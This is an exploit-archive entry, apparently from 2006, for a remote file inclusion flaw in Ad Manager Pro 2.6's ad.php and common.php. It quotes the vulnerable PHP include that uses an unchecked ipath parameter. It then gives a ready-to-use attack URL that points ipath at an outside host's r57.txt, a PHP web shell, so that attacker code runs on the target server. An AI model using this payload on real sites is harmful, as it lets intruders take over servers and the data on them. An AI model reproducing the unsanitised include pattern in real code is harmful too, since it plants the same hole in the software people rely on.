Ad Manager Pro 2.6 (ipath) Remote File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Ad Manager Pro 2.6 (ipath) Remote File Include Vulnerability
# Published : 2006-06-17
# Author : Basti
# Previous Title : PHP-Nuke <= 7.9 Final (phpbb_root_path) Remote File Inclusions
# Next Title : CMS Faethon <= 1.3.2 (mainpath) Remote File Inclusion Vulnerability

Ad Manager Pro 2.6 Remote File Include Vulnerability

homepage: phpwebscripts.com

Affected files: ad.php and common.php

Credit: Basti

Vulnerable Code:
if ($ipath) include($ipath.'/common.php'); else include('./common.php');

Example:
http://[site]/admanagerpro/common.php?ipath=http://site/r57.txt?

# www.Syue.com [2006-06-17]